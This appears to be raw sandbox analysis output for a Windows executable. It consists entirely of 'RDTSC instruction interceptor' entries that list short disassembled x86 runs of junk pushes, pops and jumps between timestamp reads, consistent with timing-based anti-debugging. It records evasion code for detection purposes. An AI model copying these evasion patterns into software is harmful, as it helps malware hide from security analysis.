Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7E0A5 second address: F7E0D3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBCC4DE8CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FBCC4DE8CD5h 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 ja 00007FBCC4DE8CD7h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7E0D3 second address: F7E0E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4EB33ABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7E0E2 second address: F7E0E7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7E6C2 second address: F7E6D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FBCC4EB33A6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7E6D4 second address: F7E6E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CCFh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7E6E9 second address: F7E70F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007FBCC4EB33A6h 0x00000009 jmp 00007FBCC4EB33AEh 0x0000000e pop ebx 0x0000000f js 00007FBCC4EB33B2h 0x00000015 jns 00007FBCC4EB33A6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EADE second address: F7EAE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EAE4 second address: F7EAEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EAEF second address: F7EAF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EAF3 second address: F7EAF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EAF7 second address: F7EB1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBCC4DE8CC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FBCC4DE8CD5h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jmp 00007FBCC4DE8CCDh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EC7D second address: F7EC8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FBCC4EB33A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EC8C second address: F7EC91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EC91 second address: F7EC9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EC9A second address: F7ECA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7ECA2 second address: F7ECC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4EB33B5h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7ECC3 second address: F7ECCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBCC4DE8CC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7ECCF second address: F7ECD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7ECD8 second address: F7ECDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7ECDE second address: F7ECE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EE5A second address: F7EE60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EE60 second address: F7EE67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EE67 second address: F7EE6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EE6C second address: F7EEB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnc 00007FBCC4EB33A6h 0x0000000c jo 00007FBCC4EB33A6h 0x00000012 popad 0x00000013 pushad 0x00000014 je 00007FBCC4EB33A6h 0x0000001a jmp 00007FBCC4EB33ACh 0x0000001f popad 0x00000020 pop edx 0x00000021 pop eax 0x00000022 pushad 0x00000023 jmp 00007FBCC4EB33B1h 0x00000028 jmp 00007FBCC4EB33ABh 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7EEB7 second address: F7EEBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7F30F second address: F7F32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4EB33B6h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7F32A second address: F7F337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FBCC4DE8CC6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F7F337 second address: F7F347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jbe 00007FBCC4EB33A6h 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F83AA5 second address: F83AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F83AA9 second address: F83AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FBCC4EB33B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F83AC5 second address: F83ACD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F83ACD second address: F83AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F83AD1 second address: F83AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F83AE4 second address: F83AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBCC4EB33A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F83AEF second address: F83AFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FBCC4DE8CC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F83AFA second address: F83B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4EB33ABh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F83DDC second address: F83DF6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBCC4DE8CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pushad 0x0000000c pushad 0x0000000d jnl 00007FBCC4DE8CC6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F83DF6 second address: F83DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F83DFA second address: F83DFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F8404B second address: F8406B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBCC4EB33B4h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F8406B second address: F8406F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F8406F second address: F84075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F84075 second address: F8407F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F8407F second address: F84085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F84085 second address: F84089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F841F8 second address: F84225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4EB33B2h 0x00000009 jmp 00007FBCC4EB33B3h 0x0000000e popad 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F837F2 second address: F837F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F837F8 second address: F83802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FBCC4EB33A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: F8AFD4 second address: F8AFD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FF228A second address: FF228E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FF228E second address: FF229E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBCC4EB33A6h 0x00000008 jp 00007FBCC4EB33A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FF229E second address: FF22A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFD075 second address: FFD07B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFD07B second address: FFD07F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFD07F second address: FFD0D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007FBCC4EB33A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007FBCC4EB33B1h 0x00000014 pop edx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 jl 00007FBCC4EB33B1h 0x0000001e jmp 00007FBCC4EB33ABh 0x00000023 jmp 00007FBCC4EB33B9h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFD0D1 second address: FFD0E2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBCC4DE8CC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFB937 second address: FFB952 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBCC4EB33B2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFB952 second address: FFB964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCC4DE8CCCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFBB04 second address: FFBB23 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBCC4EB33B2h 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jno 00007FBCC4EB33A6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFBB23 second address: FFBB29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFBB29 second address: FFBB3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FBCC4EB33A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFBB3A second address: FFBB3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFBB3E second address: FFBB46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFBB46 second address: FFBB56 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBCC4DE8CD2h 0x00000008 jp 00007FBCC4DE8CC6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFBDE1 second address: FFBDE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFBDE5 second address: FFBE2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CD7h 0x00000007 jmp 00007FBCC4DE8CD7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBCC4DE8CCFh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFBE2B second address: FFBE5E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBCC4EB33A6h 0x00000008 jmp 00007FBCC4EB33B7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 jl 00007FBCC4EB33A6h 0x00000018 pushad 0x00000019 popad 0x0000001a jno 00007FBCC4EB33A6h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFC45E second address: FFC462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFC462 second address: FFC478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FBCC4EB33B0h 0x0000000c jmp 00007FBCC4EB33AAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: FFC478 second address: FFC47D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1001475 second address: 1001484 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33ABh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1001484 second address: 1001492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FBCC4DE8CCCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1001492 second address: 100149A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 100149A second address: 100149E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1001183 second address: 100118E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBCC4EB33A6h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1005695 second address: 100569A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 103EC92 second address: 103EC98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 103EC98 second address: 103EC9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 103EC9C second address: 103ECA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 103ECA0 second address: 103ECA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 104783D second address: 1047841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 10476CD second address: 10476D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1054B31 second address: 1054B5B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBCC4EB33A6h 0x00000008 jmp 00007FBCC4EB33B1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 ja 00007FBCC4EB33CCh 0x00000016 ja 00007FBCC4EB33C2h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11199E5 second address: 11199EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11199EA second address: 1119A09 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBCC4EB33AEh 0x00000008 push ebx 0x00000009 jmp 00007FBCC4EB33ACh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111888B second address: 111888F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 111888F second address: 11188B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FBCC4EB33B7h 0x0000000c jnl 00007FBCC4EB33A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11188B5 second address: 11188EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBCC4DE8CD0h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007FBCC4DE8CD9h 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1118BC0 second address: 1118BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1118BC6 second address: 1118BCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1118EC2 second address: 1118EF6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBCC4EB33C0h 0x00000008 jnl 00007FBCC4EB33A6h 0x0000000e jmp 00007FBCC4EB33B4h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jns 00007FBCC4EB33BCh 0x0000001b push eax 0x0000001c push edx 0x0000001d jno 00007FBCC4EB33A6h 0x00000023 push edx 0x00000024 pop edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 1118EF6 second address: 1118EFC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11192D2 second address: 11192DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 11192DA second address: 11192DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
